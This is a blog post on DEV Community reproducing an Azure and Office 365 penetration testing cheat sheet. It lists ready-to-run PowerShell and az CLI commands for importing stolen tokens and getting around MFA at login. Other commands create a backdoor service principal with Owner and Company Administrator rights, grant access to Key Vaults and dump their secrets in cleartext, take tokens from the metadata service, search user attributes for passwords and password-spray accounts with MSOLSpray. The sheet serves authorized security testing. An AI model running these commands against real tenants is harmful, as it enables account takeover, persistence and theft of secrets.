Movatterモバイル変換


[0]ホーム

URL:


Skip to content
DEV Community
Log in Create account

DEV Community

Eng Soon Cheah
Eng Soon Cheah

Posted on • Edited on

     

Azure Penetration Testing Cheat sheet

Microsoft Azure & O365 CLI Tool Cheatsheet

By Beau Bullock (@dafthack)

Az PowerShell Module

Import-ModuleAz
Enter fullscreen modeExit fullscreen mode

Authentication

Connect-AzAccount## Or this way sometimes gets around MFA restrictions$credential=Get-CredentialConnect-AzAccount-Credential$credential
Enter fullscreen modeExit fullscreen mode

Import a context file

Import-AzContext-Profile'C:\Temp\Live Tokens\StolenToken.json'
Enter fullscreen modeExit fullscreen mode

Export a context file

Save-AzContext-PathC:\Temp\AzureAccessToken.json
Enter fullscreen modeExit fullscreen mode

Account Information

List the current Azure contexts available

Get-AzContext-ListAvailable
Enter fullscreen modeExit fullscreen mode

Get context details

$context=Get-AzContext$context.Name$context.Account
Enter fullscreen modeExit fullscreen mode

List subscriptions

Get-AzSubscription
Enter fullscreen modeExit fullscreen mode

Choose a subscription

Select-AzSubscription-SubscriptionID"SubscriptionID"
Enter fullscreen modeExit fullscreen mode

Get the current user's role assignment

Get-AzRoleAssignment
Enter fullscreen modeExit fullscreen mode

List all resources and resource groups

Get-AzResourceGet-AzResourceGroup
Enter fullscreen modeExit fullscreen mode

List storage accounts

Get-AzStorageAccount
Enter fullscreen modeExit fullscreen mode

WebApps & SQL

List Azure web applications

Get-AzAdApplicationGet-AzWebApp
Enter fullscreen modeExit fullscreen mode

List SQL servers

Get-AzSQLServer
Enter fullscreen modeExit fullscreen mode

Individual databases can be listed with information retrieved from the previous command

Get-AzSqlDatabase-ServerName$ServerName-ResourceGroupName$ResourceGroupName
Enter fullscreen modeExit fullscreen mode

List SQL Firewall rules

Get-AzSqlServerFirewallRuleServerName$ServerName-ResourceGroupName$ResourceGroupName
Enter fullscreen modeExit fullscreen mode

List SQL Server AD Admins

Get-AzSqlServerActiveDirectoryAdminstrator-ServerName$ServerName-ResourceGroupName$ResourceGroupName
Enter fullscreen modeExit fullscreen mode

Runbooks

List Azure Runbooks

Get-AzAutomationAccountGet-AzAutomationRunbook-AutomationAccountName<AutomationAccountName>-ResourceGroupName<ResourceGroupName>
Enter fullscreen modeExit fullscreen mode

Export a runbook with:

Export-AzAutomationRunbook-AutomationAccountName$AccountName-ResourceGroupName$ResourceGroupName-Name$RunbookName-OutputFolder.\Desktop\
Enter fullscreen modeExit fullscreen mode

Virtual Machines

List VMs and get OS details

Get-AzVM$vm=Get-AzVM-Name"VM Name"$vm.OSProfile
Enter fullscreen modeExit fullscreen mode

Run commands on VMs

Invoke-AzVMRunCommand-ResourceGroupName$ResourceGroupName-VMName$VMName-CommandIdRunPowerShellScript-ScriptPath./powershell-script.ps1
Enter fullscreen modeExit fullscreen mode

Networking

List virtual networks

Get-AzVirtualNetwork
Enter fullscreen modeExit fullscreen mode

List public IP addresses assigned to virtual NICs

Get-AzPublicIpAddress
Enter fullscreen modeExit fullscreen mode

Get Azure ExpressRoute (VPN) Info

Get-AzExpressRouteCircuit
Enter fullscreen modeExit fullscreen mode

Backdoors

Create a new Azure service principal as a backdoor

$spn=New-AzAdServicePrincipal-DisplayName"WebService"-RoleOwner$spn$BSTR=[System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)$UnsecureSecret=[System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)$UnsecureSecret$sp=Get-MsolServicePrincipal-AppPrincipalId<AppID>$role=Get-MsolRole-RoleName"Company Administrator"Add-MsolRoleMember-RoleObjectId$role.ObjectId-RoleMemberTypeServicePrincipal-RoleMemberObjectId$sp.ObjectId#Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt$cred=Get-CredentialConnect-AzAccount-Credential$cred-TenanttenantID" -ServicePrincipal
Enter fullscreen modeExit fullscreen mode

MSOnline PowerShell Module

Import-ModuleMSOnline
Enter fullscreen modeExit fullscreen mode

Authentication

Connect-MsolService## Or this way sometimes gets around MFA restrictions$credential=Get-CredentialConnect-MsolService-Credential$credential
Enter fullscreen modeExit fullscreen mode

Account and Directory Information

List Company Information

Get-MSolCompanyInformation
Enter fullscreen modeExit fullscreen mode

List all users

Get-MSolUser-All
Enter fullscreen modeExit fullscreen mode

List all groups

Get-MSolGroup-All
Enter fullscreen modeExit fullscreen mode

List members of a group (Global Admins in this case)

Get-MsolRole-RoleName"Company Administrator"Get-MSolGroupMemberGroupObjectId$GUID
Enter fullscreen modeExit fullscreen mode

List all user attributes

Get-MSolUserAll|fl
Enter fullscreen modeExit fullscreen mode

List Service Principals

Get-MsolServicePrincipal
Enter fullscreen modeExit fullscreen mode

One-liner to search all Azure AD user attributes for passwords

$users=Get-MsolUser;foreach($userin$users){$props=@();$user|Get-Member|foreach-object{$props+=$_.Name};foreach($propin$props){if($user.$prop-like"*password*"){Write-Output("[*]"+$user.UserPrincipalName+"["+$prop+"]"+" : "+$user.$prop)}}}
Enter fullscreen modeExit fullscreen mode

Az CLI Tool

Authentication

az login
Enter fullscreen modeExit fullscreen mode

Dump Azure Key Vaults

List out any key vault resources the current account can view

az keyvault list –query'[].name'--output tsv
Enter fullscreen modeExit fullscreen mode

With contributor level access you can give yourself the right permissions to obtain secrets.

az keyvault set-policy--name <KeyVaultname>--upn <YourContributorUsername>--secret-permissions get list--key-permissions get list--storage-permissions get list--certificate-permissions get list
Enter fullscreen modeExit fullscreen mode

Get URI for Key Vault

az keyvault secret list--vault-name <KeyVaultName>--query'[].id'--output tsv
Enter fullscreen modeExit fullscreen mode

Get cleartext secret from keyvault

az keyvault secret show--id <URI from lastcommand> | ConvertFrom-Json
Enter fullscreen modeExit fullscreen mode

Metadata Service URL

http://169.254.169.254/metadata
Enter fullscreen modeExit fullscreen mode

Get access tokens from the metadata service

GET'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' HTTP/1.1 Metadata:true
Enter fullscreen modeExit fullscreen mode

Other Azure & O365 Tools

MicroBurst

Azure security assessment tool

https://github.com/NetSPI/MicroBurst

Look for open storage blobs

Invoke-EnumerateAzureBlobs-Base$BaseName
Enter fullscreen modeExit fullscreen mode

Export SSL/TLS certs

Get-AzPasswords-ExportCertsY
Enter fullscreen modeExit fullscreen mode

Azure Container Registry dump

Get-AzPasswordsGet-AzACR
Enter fullscreen modeExit fullscreen mode

PowerZure

Azure security assessment tool

https://github.com/hausec/PowerZure

ROADTools

Framework to interact with Azure AD

https://github.com/dirkjanm/ROADtools

Stormspotter

Red team tool for graphing Azure and Azure AD objects

https://github.com/Azure/Stormspotter

MSOLSpray

Tool to password spray Azure/O365

https://github.com/dafthack

Import-Module.\MSOLSpray.ps1Invoke-MSOLSpray-UserList.\userlist.txt-PasswordSpring2020
Enter fullscreen modeExit fullscreen mode

Top comments(1)

Subscribe
pic
Create template

Templates let you quickly answer FAQs or store snippets for re-use.

Dismiss
CollapseExpand
 
lewisblakeney profile image
lewisblakeney
Tech Enthusiast
  • Location
    Atlanta,US
  • Work
    Full Stack Developer
  • Joined

Penetration testing companies can provide you with the expertise and resources you need to test your Azure environment and identify any security vulnerabilities. They will work with you to develop a custom testing plan that meets your specific needs and budget.

Are you sure you want to hide this comment? It will become hidden in your post, but will still be visible via the comment'spermalink.

For further actions, you may consider blocking this person and/orreporting abuse

Pursuit my dreams working in U.S.
  • Location
    Singapore
  • Work
    Microsoft MVP
  • Joined

More fromEng Soon Cheah

DEV Community

We're a place where coders share, stay up-to-date and grow their careers.

Log in Create account

[8]ページ先頭

©2009-2025 Movatter.jp